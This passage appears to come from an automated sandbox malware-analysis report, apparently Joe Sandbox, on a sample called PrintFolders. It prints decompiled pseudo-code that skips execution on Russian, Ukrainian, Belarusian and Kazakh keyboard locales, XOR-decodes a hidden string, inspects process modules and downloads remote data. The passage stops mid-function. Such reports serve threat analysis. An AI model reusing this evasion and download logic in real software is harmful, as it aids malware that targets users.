							_push(_t361);
							_t363 = _t484;
							_t495 = (_t484 - 0x00000008 & 0xfffffff8) + 4;
							_push(_t470);
							_v128 = _t363[1];
							_t473 = _t495;
							_push(0xffffffff);
							_push(0x42c572);
							_push( *[fs:0x0]);
							_push(_t363);
							_t496 = _t495 - 0x630;
							_t245 =  *0x43d054; // 0x7bd02ead
							_t246 = _t245 ^ _t473;
							_v152 = _t246;
							_push(_t452);
							_push(_t443);
							_push(_t246);
							 *[fs:0x0] =  &_v144;
							_t457 = _t393;
							_v1688 = _t457;
							_v1728 = _t457;
							asm("xorps xmm0, xmm0");
							_v1692 = 0;
							asm("movq [esi], xmm0");
							 *(_t457 + 8) = 0;
							 *_t457 = 0;
							 *(_t457 + 4) = 0;
							 *(_t457 + 8) = 0;
							_v136 = 0;
							_v1692 = 1;
							_t249 = GetKeyboardLayoutList(0x400,  &_v1684);
							_t445 = 0;
							_v1688 = _t249;
							__eflags = _t249;
							if(_t249 <= 0) {
								L63:
								 *[fs:0x0] = _v36;
								_pop(_t446);
								_pop(_t458);
								__eflags = _v44 ^ _t473;
								return E0040EBBF(_t457, _t363, _v44 ^ _t473, _t434, _t446, _t458);
							} else {
								do {
									_t252 =  *(_t473 + _t445 * 4 - 0x610) & 0x0000ffff;
									_v1588 = _t252;
									GetLocaleInfoA(_t252, 2,  &_v552, 0x1f4); // executed
									_t254 =  &_v552;
									_v1616 = 0;
									_v1600 = 0;
									_t435 = _t254 + 1;
									_v1596 = 0xf;
									_v1616 = 0;
									do {
										_t399 =  *_t254;
										_t254 = _t254 + 1;
										__eflags = _t399;
									} while (_t399 != 0);
									E004026B0(_t363,  &_v1616,  &_v552, _t254 - _t435);
									_t401 = _v1588;
									_v1592 = _t401;
									_v28 = 1;
									_t258 =  *(_t457 + 4);
									__eflags = _t258 -  *(_t457 + 8);
									if(_t258 ==  *(_t457 + 8)) {
										_push( &_v1616);
										_push(_t258);
										E0040CC40(_t363, _t457, _t445, _t457);
										_t434 = _v1596;
									} else {
										asm("movups xmm0, [ebp-0x638]");
										_t434 = 0xf;
										_v1616 = 0;
										asm("movups [eax], xmm0");
										asm("movq xmm0, [ebp-0x628]");
										asm("movq [eax+0x10], xmm0");
										 *(_t258 + 0x18) = _t401;
										 *(_t457 + 4) =  *(_t457 + 4) + 0x1c;
									}
									_v28 = 0;
									__eflags = _t434 - 0x10;
									if(_t434 < 0x10) {
										goto L62;
									} else {
										_t404 = _v1616;
										_t434 = _t434 + 1;
										_t260 = _t404;
										__eflags = _t434 - 0x1000;
										if(_t434 < 0x1000) {
											L61:
											_push(_t434);
											E0040EDFF(_t404);
											_t496 = _t496 + 8;
											goto L62;
										} else {
											_t404 =  *(_t404 - 4);
											_t434 = _t434 + 0x23;
											__eflags = _t260 - _t404 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												E00413527(_t363, _t434, __eflags);
												asm("int3");
												_push(_t473);
												_t475 = _t496;
												_push(0xffffffff);
												_push(0x42c5b5);
												_push( *[fs:0x0]);
												_t499 = _t496 - 0x5c;
												_t266 =  *0x43d054; // 0x7bd02ead
												_t267 = _t266 ^ _t475;
												_v1760 = _t267;
												_push(_t363);
												_push(_t457);
												_push(_t445);
												_push(_t267);
												 *[fs:0x0] =  &_v1756;
												_t365 = 0;
												_t405 =  &_v1780;
												asm("xorps xmm0, xmm0");
												_v1816 = 0;
												asm("movq [ebp-0x24], xmm0");
												_v1772 = 0;
												L51(); // executed
												_v1748 = 0;
												_t269 = _v1776;
												_t447 = _v1780;
												_v1820 = _t269;
												__eflags = _t447 - _t269;
												if(_t447 == _t269) {
													L92:
													_t366 = 0;
													__eflags = 0;
													goto L93;
												} else {
													_v52 = 0x5d5d5b7c;
													_v48 = 0x2e404f47;
													_t464 =  *( *[fs:0x2c]);
													_v108 = _t464;
													do {
														E0040BB90(_t365,  &_v92, _t434, _t447, _t447);
														_v68 =  *((intOrPtr*)(_t447 + 0x18));
														_v32 = 1;
														_t302 =  *0x451008;
														__eflags =  *0x451008 -  *((intOrPtr*)(_t464 + 4));
														if( *0x451008 >  *((intOrPtr*)(_t464 + 4))) {
															E0040EF48(_t302, 0x451008);
															_t499 = _t499 + 4;
															__eflags =  *0x451008 - 0xffffffff;
															if(__eflags == 0) {
																_t140 =  &_v52; // 0x5d5d5b7c
																 *0x450d20 =  *_t140;
																_t141 =  &_v48; // 0x2e404f47
																 *0x450d24 =  *_t141;
																E0040F25B( &_v92, __eflags, 0x42cee0);
																E0040EEFE(0x451008);
																_t499 = _t499 + 8;
															}
														}
														_t303 =  *0x450d27; // 0x0
														__eflags = _t303;
														if(_t303 != 0) {
															 *0x450d20 =  *0x450d20 ^ 0x0000002e;
															 *0x450d21 =  *0x450d21 ^ 0x0000002e;
															 *0x450d22 =  *0x450d22 ^ 0x0000002e;
															 *0x450d23 =  *0x450d23 ^ 0x0000002e;
															 *0x450d24 =  *0x450d24 ^ 0x0000002e;
															 *0x450d25 =  *0x450d25 ^ 0x0000002e;
															 *0x450d26 =  *0x450d26 ^ 0x0000002e;
															_t327 = _t303 ^ 0x0000002e;
															__eflags = _t327;
															 *0x450d27 = _t327;
														}
														_t304 = 0x450d20;
														_v132 = 0;
														_v116 = 0;
														_v112 = 0xf;
														_t145 =  &(_t304[1]); // 0x450d21
														_t440 = _t145;
														do {
															_t422 =  *_t304;
															_t304 =  &(_t304[1]);
															__eflags = _t422;
														} while (_t422 != 0);
														E004026B0(_t365,  &_v132, 0x450d20, _t304 - _t440);
														_t457 = _v92;
														_t434 = _v76;
														__eflags = _v112 - 0x10;
														_v100 = _t365 | 0x00000001;
														_t366 = _v132;
														_t308 =  >=  ? _t366 :  &_v132;
														__eflags = _v72 - 0x10;
														_t405 =  >=  ? _t457 :  &_v92;
														_t309 = E00402890(_t405, _t434, _t405,  >=  ? _t366 :  &_v132, _v116);
														_t499 = _t499 + 0xc;
														__eflags = _t309 - 0xffffffff;
														if(_t309 != 0xffffffff) {
															L76:
															_v93 = 1;
														} else {
															__eflags = _v72 - 0x10;
															_t434 = _v76;
															_t405 =  >=  ? _t457 :  &_v92;
															_t326 = E00402890(_t405, _t434, _t405, 0x439a6c, 7);
															_t499 = _t499 + 0xc;
															_v93 = 0;
															__eflags = _t326 - 0xffffffff;
															if(_t326 != 0xffffffff) {
																goto L76;
															}
														}
														_v100 = _v100 & 0xfffffffe;
														_t310 = _v112;
														__eflags = _t310 - 0x10;
														if(_t310 < 0x10) {
															L81:
															__eflags = _v93;
															if(_v93 != 0) {
																L97:
																_t311 = _v72;
																__eflags = _t311 - 0x10;
																if(_t311 < 0x10) {
																	L101:
																	_t447 = _v64;
																	_t366 = 1;
																	L93:
																	__eflags = _t447;
																	if(_t447 == 0) {
																		L103:
																		 *[fs:0x0] = _v40;
																		_pop(_t448);
																		_pop(_t459);
																		_pop(_t367);
																		__eflags = _v44 ^ _t475;
																		return E0040EBBF(_t366, _t367, _v44 ^ _t475, _t434, _t448, _t459);
																	} else {
																		_push(_t405);
																		E0040D380(_t447, _v60, _t447, _t457);
																		_t460 = _v64;
																		_t501 = _t499 + 4;
																		_t434 = (0x92492493 * (_v56 - _t460) >> 0x20) + _v56 - _t460 >> 4;
																		_t278 = _t460;
																		_t415 = ((_t434 >> 0x1f) + _t434) * 8 - (_t434 >> 0x1f) + _t434 << 2;
																		__eflags = _t415 - 0x1000;
																		if(_t415 < 0x1000) {
																			L102:
																			_push(_t415);
																			E0040EDFF(_t460);
																			goto L103;
																		} else {
																			_t460 =  *((intOrPtr*)(_t460 - 4));
																			_t415 = _t415 + 0x23;
																			__eflags = _t278 - _t460 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				E00413527(_t366, _t434, __eflags);
																				goto L105;
																			} else {
																				goto L102;
																			}
																		}
																	}
																} else {
																	_t187 = _t311 + 1; // 0x11
																	_t405 = _t187;
																	_t312 = _t457;
																	__eflags = _t405 - 0x1000;
																	if(_t405 < 0x1000) {
																		L100:
																		_push(_t405);
																		E0040EDFF(_t457);
																		_t499 = _t499 + 8;
																		goto L101;
																	} else {
																		_t460 =  *((intOrPtr*)(_t457 - 4));
																		_t415 = _t405 + 0x23;
																		__eflags = _t312 - _t460 + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L105;
																		} else {
																			goto L100;
																		}
																	}
																}
															} else {
																_t316 = _v68;
																__eflags = _t316 - 0x419;
																if(_t316 == 0x419) {
																	goto L97;
																} else {
																	__eflags = _t316 - 0x422;
																	if(_t316 == 0x422) {
																		goto L97;
																	} else {
																		__eflags = _t316 - 0x423;
																		if(_t316 == 0x423) {
																			goto L97;
																		} else {
																			__eflags = _t316 - 0x43f;
																			if(_t316 == 0x43f) {
																				goto L97;
																			} else {
																				_v32 = 0;
																				_t317 = _v72;
																				__eflags = _t317 - 0x10;
																				if(_t317 < 0x10) {
																					goto L90;
																				} else {
																					_t171 = _t317 + 1; // 0x11
																					_t405 = _t171;
																					_t318 = _t457;
																					__eflags = _t405 - 0x1000;
																					if(_t405 < 0x1000) {
																						L89:
																						_push(_t405);
																						E0040EDFF(_t457);
																						_t499 = _t499 + 8;
																						goto L90;
																					} else {
																						_t460 =  *((intOrPtr*)(_t457 - 4));
																						_t415 = _t405 + 0x23;
																						__eflags = _t318 - _t460 + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L105;
																						} else {
																							goto L89;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															_t164 = _t310 + 1; // 0x11
															_t405 = _t164;
															_t322 = _t366;
															__eflags = _t405 - 0x1000;
															if(_t405 < 0x1000) {
																L80:
																_push(_t405);
																E0040EDFF(_t366);
																_t457 = _v92;
																_t499 = _t499 + 8;
																goto L81;
															} else {
																_t366 =  *(_t366 - 4);
																_t415 = _t405 + 0x23;
																__eflags = _t322 - _t366 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	L105:
																	E00413527(_t366, _t434, __eflags);
																	asm("int3");
																	asm("int3");
																	_push(_t475);
																	_t477 = _t501;
																	_t284 =  *0x43d054; // 0x7bd02ead
																	_v1872 = _t284 ^ _t477;
																	_push(_t460);
																	_push(_t447);
																	_t449 = _t415;
																	_v2140 = _t449;
																	_v2140 = _t449;
																	_t286 =  *0x439a7c; // 0x3e
																	asm("movq xmm0, [0x439a74]");
																	_v2124 = _t286;
																	asm("movq [ebp-0x108], xmm0");
																	E00410B00(_t449,  &_v2122, 0, 0xfa);
																	_t462 = OpenProcess(0x410, 0, _t434);
																	__eflags = _t462;
																	if(_t462 != 0) {
																		_t297 =  &_v304;
																		__imp__K32EnumProcessModules(_t462, _t297, 4,  &_v300); // executed
																		__eflags = _t297;
																		if(_t297 != 0) {
																			__imp__K32GetModuleBaseNameA(_t462, _v304,  &_v296, 0x104); // executed
																		}
																	}
																	FindCloseChangeNotification(_t462); // executed
																	_t416 =  &_v296;
																	 *_t449 = 0;
																	_t449[4] = 0;
																	_t439 = _t416 + 1;
																	_t449[5] = 0xf;
																	 *_t449 = 0;
																	do {
																		_t291 =  *_t416;
																		_t416 = _t416 + 1;
																		__eflags = _t291;
																	} while (_t291 != 0);
																	E004026B0(_t366, _t449,  &_v296, _t416 - _t439);
																	_pop(_t450);
																	__eflags = _v36 ^ _t477;
																	_pop(_t463);
																	return E0040EBBF(_t449, _t366, _v36 ^ _t477, _t439, _t450, _t463);
																} else {
																	goto L80;
																}
															}
														}
														goto L112;
														L90:
														_t365 = _v100;
														_t447 = _t447 + 0x1c;
														_t464 = _v108;
														__eflags = _t447 - _v104;
													} while (_t447 != _v104);
													_t447 = _v64;
													goto L92;
												}
											} else {
												goto L61;
											}
										}
									}
									goto L112;
									L62:
									_t445 = _t445 + 1;
									__eflags = _t445 - _v1580;
								} while (_t445 < _v1580);
								goto L63;
							}
						} else {
							goto L13;
						}
					}
				}
				L112:
			}

0x00404840
0x00404840
0x00404841
0x00404849
0x00404850
0x00404854
0x00404856
0x00404858
0x00404863
0x00404864
0x00404865
0x00404868
0x0040486d
0x0040486f
0x00404872
0x00404874
0x00404878
0x00404884
0x0040488b
0x00404892
0x00404899
0x0040489b
0x004048a6
0x004048ad
0x004048b2
0x004048b5
0x004048bc
0x004048be
0x004048cb
0x004048d3
0x004048d8
0x004048e5
0x004048ea
0x004048ea
0x004048bc
0x004048f4
0x004048f6
0x00404900
0x00404900
0x00404907
0x00404908
0x00404900
0x0040490d
0x00404912
0x00404919
0x00404920
0x00404927
0x0040492b
0x0040492b
0x00404930
0x00404930
0x00404932
0x00404933
0x00404942
0x00404947
0x00404955
0x0040495a
0x0040495f
0x00404961
0x00404968
0x0040496a
0x00404971
0x00404974
0x0040497b
0x0040497f
0x0040497f
0x00404982
0x00404982
0x00404984
0x00404985
0x00404990
0x00404995
0x00404999
0x0040499f
0x004049cd
0x004049d2
0x004049d7
0x004049de
0x004049e5
0x004049e9
0x004049eb
0x004049f3
0x00404a16
0x00404a1a
0x00404a1d
0x00404a20
0x00404a22
0x004049f5
0x004049fb
0x004049fe
0x00404a02
0x00404a04
0x00404a07
0x00404a08
0x00404a0d
0x00404a10
0x00404a10
0x00404a27
0x00404a2c
0x00404a33
0x00404a3a
0x00404a44
0x00404a4b
0x00404a50
0x00404a53
0x00404a5a
0x00404a5c
0x00404a69
0x00404a71
0x00404a76
0x00404a83
0x00404a88
0x00404a88
0x00404a5a
0x00404a8b
0x00404a92
0x00404a94
0x00404a9b
0x00404aa2
0x00404aa9
0x00404ab0
0x00404ab7
0x00404abe
0x00404ac5
0x00404ace
0x00404ace
0x00404ad3
0x00404ad6
0x00404adb
0x00404add
0x00404add
0x00404ae0
0x00404ae6
0x00404aed
0x00404af4
0x00404af4
0x00404af6
0x00404af7
0x00404b05
0x00404b0d
0x00404b12
0x00404b15
0x00404b1b
0x00404b20
0x00404b2a
0x00404b31
0x00404b36
0x00404b39
0x00404b40
0x00404b42
0x00404b51
0x00404b58
0x00404b5d
0x00404b6a
0x00404b6f
0x00404b6f
0x00404b40
0x00404b72
0x00404b79
0x00404b7b
0x00404b84
0x00404b8b
0x00404b8f
0x00404b94
0x00404b94
0x00404b9b
0x00404b9e
0x00404ba3
0x00404ba5
0x00404ba5
0x00404ba8
0x00404bae
0x00404bb5
0x00404bc0
0x00404bc0
0x00404bc2
0x00404bc3
0x00404bd1
0x00404bd9
0x00404bde
0x00404be1
0x00404be9
0x00404bee
0x00404bf8
0x00404bff
0x00404c04
0x00404c07
0x00404c0e
0x00404c10
0x00404c20
0x00404c27
0x00404c2d
0x00404c3a
0x00404c3f
0x00404c3f
0x00404c0e
0x00404c49
0x00404c4b
0x00404c52
0x00404c57
0x00404c5e
0x00404c62
0x00404c70
0x00404c70
0x00404c77
0x00404c78
0x00404c70
0x00404c7d
0x00404c80
0x00404c85
0x00404c87
0x00404c87
0x00404c8a
0x00404c90
0x00404c97
0x00404ca0
0x00404ca0
0x00404ca2
0x00404ca3
0x00404cb1
0x00404cb9
0x00404cbe
0x00404cc3
0x00404cd8
0x00404cd8
0x00404cd1
0x00404cd1
0x00404cd1
0x00404cda
0x00404ce0
0x00404d0a
0x00404d0f
0x00404d17
0x00404d18
0x00404d29
0x00404ce2
0x00404ce2
0x00404ce5
0x00404ce6
0x00404cee
0x00404d00
0x00404d00
0x00404d02
0x00000000
0x00404cf0
0x00404cf0
0x00404cf3
0x00404cfe
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cfe
0x00404cee
0x004049a1
0x004049a1
0x004049a4
0x004049a5
0x004049ad
0x004049c3
0x004049c3
0x004049c5
0x004049ca
0x00000000
0x004049af
0x004049af
0x004049b2
0x004049bd
0x00404d2a
0x00404d2f
0x00404d2f
0x00404d34
0x00404d35
0x00404d36
0x00404d37
0x00404d38
0x00404d39
0x00404d3a
0x00404d3b
0x00404d3c
0x00404d3d
0x00404d3e
0x00404d3f
0x00404d40
0x00404d41
0x00404d49
0x00404d4c
0x00404d50
0x00404d54
0x00404d56
0x00404d58
0x00404d63
0x00404d64
0x00404d65
0x00404d6b
0x00404d70
0x00404d72
0x00404d75
0x00404d76
0x00404d77
0x00404d7b
0x00404d81
0x00404d83
0x00404d89
0x00404d8f
0x00404d92
0x00404d9c
0x00404da0
0x00404da7
0x00404dad
0x00404db4
0x00404dc1
0x00404dce
0x00404dd8
0x00404dde
0x00404de0
0x00404de6
0x00404de8
0x00404efa
0x00404eff
0x00404f07
0x00404f08
0x00404f0c
0x00404f19
0x00404df0
0x00404df0
0x00404df0
0x00404e07
0x00404e0d
0x00404e13
0x00404e19
0x00404e23
0x00404e2d
0x00404e30
0x00404e3a
0x00404e41
0x00404e41
0x00404e43
0x00404e44
0x00404e44
0x00404e58
0x00404e5d
0x00404e63
0x00404e69
0x00404e70
0x00404e73
0x00404e76
0x00404eaa
0x00404eab
0x00404eae
0x00404eb3
0x00404e78
0x00404e78
0x00404e7f
0x00404e84
0x00404e8b
0x00404e8e
0x00404e96
0x00404e9b
0x00404e9e
0x00404e9e
0x00404eb9
0x00404ebd
0x00404ec0
0x00000000
0x00404ec2
0x00404ec2
0x00404ec8
0x00404ec9
0x00404ecb
0x00404ed1
0x00404ee3
0x00404ee3
0x00404ee5
0x00404eea
0x00000000
0x00404ed3
0x00404ed3
0x00404ed6
0x00404ede
0x00404ee1
0x00404f1a
0x00404f1f
0x00404f20
0x00404f21
0x00404f23
0x00404f25
0x00404f30
0x00404f31
0x00404f34
0x00404f39
0x00404f3b
0x00404f3e
0x00404f3f
0x00404f40
0x00404f41
0x00404f45
0x00404f4b
0x00404f4d
0x00404f50
0x00404f53
0x00404f56
0x00404f5b
0x00404f5e
0x00404f63
0x00404f66
0x00404f69
0x00404f6c
0x00404f6f
0x00404f71
0x00405185
0x00405185
0x00405185
0x00000000
0x00404f77
0x00404f7d
0x00404f84
0x00404f8b
0x00404f8d
0x00404f90
0x00404f94
0x00404f9c
0x00404f9f
0x00404fa3
0x00404fa8
0x00404fae
0x00404fb5
0x00404fba
0x00404fbd
0x00404fc4
0x00404fc6
0x00404fc9
0x00404fce
0x00404fd6
0x00404fdb
0x00404fe8
0x00404fed
0x00404fed
0x00404fc4
0x00404ff0
0x00404ff5
0x00404ff7
0x00404ff9
0x00405000
0x00405007
0x0040500e
0x00405015
0x0040501c
0x00405023
0x0040502a
0x0040502a
0x0040502c
0x0040502c
0x00405031
0x00405036
0x0040503d
0x00405044
0x0040504b
0x0040504b
0x00405050
0x00405050
0x00405052
0x00405053
0x00405053
0x00405062
0x0040506a
0x00405070
0x00405079
0x0040507d
0x00405080
0x00405083
0x00405086
0x0040508b
0x0040508f
0x00405094
0x00405097
0x0040509a
0x004050c2
0x004050c2
0x0040509c
0x0040509c
0x004050a3
0x004050a8
0x004050b1
0x004050b6
0x004050b9
0x004050bd
0x004050c0
0x00000000
0x00000000
0x004050c0
0x004050c6
0x004050ca
0x004050cd
0x004050d0
0x00405100
0x00405100
0x00405104
0x004051e0
0x004051e0
0x004051e3
0x004051e6
0x0040520f
0x0040520f
0x00405212
0x00405187
0x00405187
0x00405189
0x00405226
0x0040522b
0x00405233
0x00405234
0x00405235
0x00405239
0x00405243
0x0040518f
0x00405192
0x00405195
0x004051a2
0x004051a5
0x004051ae
0x004051c1
0x004051c3
0x004051c6
0x004051cc
0x0040521c
0x0040521c
0x0040521e
0x00000000
0x004051ce
0x004051ce
0x004051d1
0x004051d9
0x004051dc
0x00405244
0x00000000
0x004051de
0x00000000
0x004051de
0x004051dc
0x004051cc
0x004051e8
0x004051e8
0x004051e8
0x004051eb
0x004051ed
0x004051f3
0x00405205
0x00405205
0x00405207
0x0040520c
0x00000000
0x004051f5
0x004051f5
0x004051f8
0x00405200
0x00405203
0x00000000
0x00000000
0x00000000
0x00000000
0x00405203
0x004051f3
0x0040510a
0x0040510a
0x0040510d
0x00405112
0x00000000
0x00405118
0x00405118
0x0040511d
0x00000000
0x00405123
0x00405123
0x00405128
0x00000000
0x0040512e
0x0040512e
0x00405133
0x00000000
0x00405139
0x00405139
0x0040513d
0x00405140
0x00405143
0x00000000
0x00405145
0x00405145
0x00405145
0x00405148
0x0040514a
0x00405150
0x00405166
0x00405166
0x00405168
0x0040516d
0x00000000
0x00405152
0x00405152
0x00405155
0x0040515d
0x00405160
0x00000000
0x00000000
0x00000000
0x00000000
0x00405160
0x00405150
0x00405143
0x00405133
0x00405128
0x0040511d
0x00405112
0x004050d2
0x004050d2
0x004050d2
0x004050d5
0x004050d7
0x004050dd
0x004050f3
0x004050f3
0x004050f5
0x004050fa
0x004050fd
0x00000000
0x004050df
0x004050df
0x004050e2
0x004050ea
0x004050ed
0x00405249
0x00405249
0x0040524e
0x0040524f
0x00405250
0x00405251
0x00405259
0x00405260
0x00405263
0x00405264
0x00405265
0x00405269
0x0040526f
0x00405275
0x0040527b
0x00405288
0x00405298
0x004052a0
0x004052b6
0x004052b8
0x004052ba
0x004052c5
0x004052cd
0x004052d3
0x004052d5
0x004052ea
0x004052ea
0x004052d5
0x004052f1
0x004052f7
0x004052fd
0x00405303
0x0040530a
0x0040530d
0x00405314
0x00405317
0x00405317
0x00405319
0x0040531a
0x0040531a
0x0040532a
0x00405334
0x00405335
0x00405337
0x00405340
0x00000000
0x00000000
0x00000000
0x004050ed
0x004050dd
0x00000000
0x00405170
0x00405170
0x00405173
0x00405176
0x00405179
0x00405179
0x00405182
0x00000000
0x00405182
0x00000000
0x00000000
0x00000000
0x00404ee1
0x00404ed1
0x00000000
0x00404eed
0x00404eed
0x00404eee
0x00404eee
0x00000000
0x00404df0
0x00000000
0x00000000
0x00000000
0x004049bd
0x004049ad
0x00000000

APIs

Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90

__Init_thread_footer.LIBCMT ref: 004048E5

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

__Init_thread_footer.LIBCMT ref: 00404A83
__Init_thread_footer.LIBCMT ref: 00404B6A
__Init_thread_footer.LIBCMT ref: 00404C3A

Strings

{}k|, xrefs: 00404884
mmBK, xrefs: 00404A2C
\Desktop, xrefs: 004049EB
O@K\, xrefs: 00404A33

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CriticalInit_thread_footerSection$EnterLeave$ConditionVariableWake
String ID: O@K\$\Desktop$mmBK${}k|
API String ID: 4264893276-1521651405
Opcode ID: 8df569c9253b2e4154696794805b32007486ec4b4e197a8cb0baa30961dbfd60
Instruction ID: c12f54c9c6adfdaa1c56a5fc3e30a9e30d2afb8bc8bcc1abd1d89b7747afa6d4
Opcode Fuzzy Hash: 8df569c9253b2e4154696794805b32007486ec4b4e197a8cb0baa30961dbfd60
Instruction Fuzzy Hash: 82D136B59003848BEB14DF78EC067AE7B70AB45308F14427ED9403B2D3D7B9A949CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401B30 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00401B30(void* __ebx, void* __ecx, void* __edi, void* _a4) {
				intOrPtr _v4;
				char* _v8;
				char* _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _v36;
				char _v52;
				void _v56;
				intOrPtr _v60;
				char* _v64;
				char* _v80;
				intOrPtr _v84;
				signed int _v88;
				void* _v92;
				void _v288;
				int _v292;
				long _v296;
				char* _v300;
				char _v316;
				char* _v320;
				char* _v324;
				short* _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v356;
				signed int _v360;
				char* _v364;
				char* _v380;
				intOrPtr* _v488;
				char _v508;
				signed int _v516;
				intOrPtr _v520;
				char* _v524;
				char* _v540;
				intOrPtr _v544;
				char* _v572;
				void* __esi;
				void* __ebp;
				signed int _t210;
				signed int _t211;
				int _t218;
				char* _t219;
				char* _t230;
				intOrPtr _t231;
				short* _t238;
				short _t241;
				intOrPtr* _t244;
				void* _t245;
				char* _t247;
				short* _t251;
				char* _t256;
				char* _t266;
				signed int _t273;
				signed int _t275;
				void* _t281;
				intOrPtr _t294;
				signed int _t299;
				char* _t300;
				void* _t308;
				signed int _t313;
				void* _t319;
				char* _t322;
				intOrPtr _t330;
				int _t332;
				void* _t333;
				void* _t334;
				void* _t336;
				char* _t337;
				signed int _t338;
				void* _t340;
				intOrPtr _t341;
				void* _t343;
				void* _t344;
				intOrPtr* _t353;
				int _t357;
				short* _t364;
				void* _t371;
				char* _t373;
				char* _t376;
				intOrPtr* _t377;
				char _t391;
				char* _t393;
				char* _t400;
				void* _t404;
				short* _t407;
				signed int _t410;
				char* _t414;
				intOrPtr* _t416;
				intOrPtr _t418;
				signed int _t419;
				void* _t420;
				void* _t423;
				void* _t425;
				void* _t426;
				int _t427;
				short* _t428;
				void* _t430;
				intOrPtr _t432;
				signed int _t433;
				signed int _t434;
				void* _t436;
				intOrPtr* _t437;
				intOrPtr _t438;
				void* _t440;
				void* _t441;
				void* _t442;
				void* _t443;
				void* _t444;
				intOrPtr _t445;
				void* _t447;
				void* _t448;
				signed int _t451;
				signed int _t452;
				void* _t454;
				void* _t455;
				void* _t456;
				void* _t457;
				signed int _t458;
				void* _t459;
				void* _t461;
				void* _t462;

				_push(0xffffffff);
				_push(0x42c2cb);
				_push( *[fs:0x0]);
				_t455 = _t454 - 0x170;
				_t210 =  *0x43d054; // 0x7bd02ead
				_t211 = _t210 ^ _t451;
				_v24 = _t211;
				_push(__ebx);
				_push(__edi);
				_push(_t211);
				 *[fs:0x0] =  &_v16;
				_t440 = __ecx;
				_t466 =  *((intOrPtr*)(__ecx + 0x28));
				_t425 = _a4;
				_v328 = _t425;
				if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
					_v332 =  *((intOrPtr*)(__ecx + 0x34));
				} else {
					 *((intOrPtr*)(__ecx + 0x30)) = 0x7800;
					_t330 = E0040EE0D(_t425, __ecx, _t466, 0x7800);
					_t455 = _t455 + 4;
					 *((intOrPtr*)(_t440 + 0x28)) = _t330;
					 *(_t440 + 0x34) = 0;
					_v332 = 0;
				}
				_v296 = 0;
				InternetSetFilePointer(_t425, 0, 0, 0, 0);
				do {
					_t218 = InternetReadFile(_t425,  &(( *(_t440 + 0x34))[ *((intOrPtr*)(_t440 + 0x28))]), 0x3e8,  &_v296); // executed
					_t403 = _v296;
					_t332 = _t218;
					_t219 =  *(_t440 + 0x30);
					 *(_t440 + 0x34) =  &(( *(_t440 + 0x34))[_t403]);
					_t467 = _t219 -  *(_t440 + 0x34) - 0x3e8;
					if(_t219 -  *(_t440 + 0x34) <= 0x3e8) {
						 *(_t440 + 0x30) =  &(_t219[0x7800]);
						_t438 = E0040EE0D(_t425, _t440, _t467,  &(_t219[0x7800]));
						E004104C0(_t438,  *((intOrPtr*)(_t440 + 0x28)),  &(( *(_t440 + 0x34))[1]));
						L0040EBCD( *((intOrPtr*)(_t440 + 0x28)));
						_t403 = _v296;
						_t455 = _t455 + 0x14;
						 *((intOrPtr*)(_t440 + 0x28)) = _t438;
						_t425 = _v328;
					}
				} while (_t332 != 0 && _t403 != 0);
				_v296 = 0x103;
				E00410B00(_t425,  &_v288, 0, 0x104);
				_t456 = _t455 + 0xc;
				if(HttpQueryInfoA(_t425, 0x1d,  &_v288,  &_v296, 0) == 0) {
					L32:
					( *(_t440 + 0x34))[ *((intOrPtr*)(_t440 + 0x28))] = 0;
					 *[fs:0x0] = _v16;
					_pop(_t426);
					_pop(_t441);
					_pop(_t333);
					return E0040EBBF( *(_t440 + 0x34) - _v332, _t333, _v24 ^ _t451, _t403, _t426, _t441);
				} else {
					_v324 = 0;
					_t230 =  &_v316;
					_v320 = 0;
					__imp__CoCreateInstance(_t230, 0, 1, 0x42e2c0,  &_v324);
					if(_t230 < 0 || _v324 == 0) {
						goto L32;
					} else {
						_t353 =  &_v288;
						_v356 = 0;
						_v340 = 0;
						_t404 = _t353 + 1;
						_v336 = 0xf;
						_v356 = 0;
						asm("o16 nop [eax+eax]");
						do {
							_t231 =  *_t353;
							_t353 = _t353 + 1;
						} while (_t231 != 0);
						E004026B0(_t332,  &_v356,  &_v288, _t353 - _t404);
						_v8 = 0;
						_t334 = MultiByteToWideChar;
						_t357 =  &(_v340[1]);
						_t235 =  >=  ? _v356 :  &_v356;
						_v292 = _t357;
						_t427 = MultiByteToWideChar(0, 0,  >=  ? _v356 :  &_v356, _t357, 0, 0);
						_t238 = E0040EE0D(_t427, _t440, _v336 - 0x10,  ~(0 | _v336 - 0x00000010 > 0x00000000) | _t236 * 0x00000002);
						_t457 = _t456 + 4;
						_v328 = _t238;
						_t363 =  >=  ? _v356 :  &_v356;
						_t428 = _t238;
						MultiByteToWideChar(0, 0,  >=  ? _v356 :  &_v356, _v292, _t428, _t427);
						_t364 = _t428;
						_v380 = 0;
						_v364 = 0;
						_v360 = 7;
						_v380 = 0;
						_t66 =  &(_t364[1]); // 0x2
						_t407 = _t66;
						do {
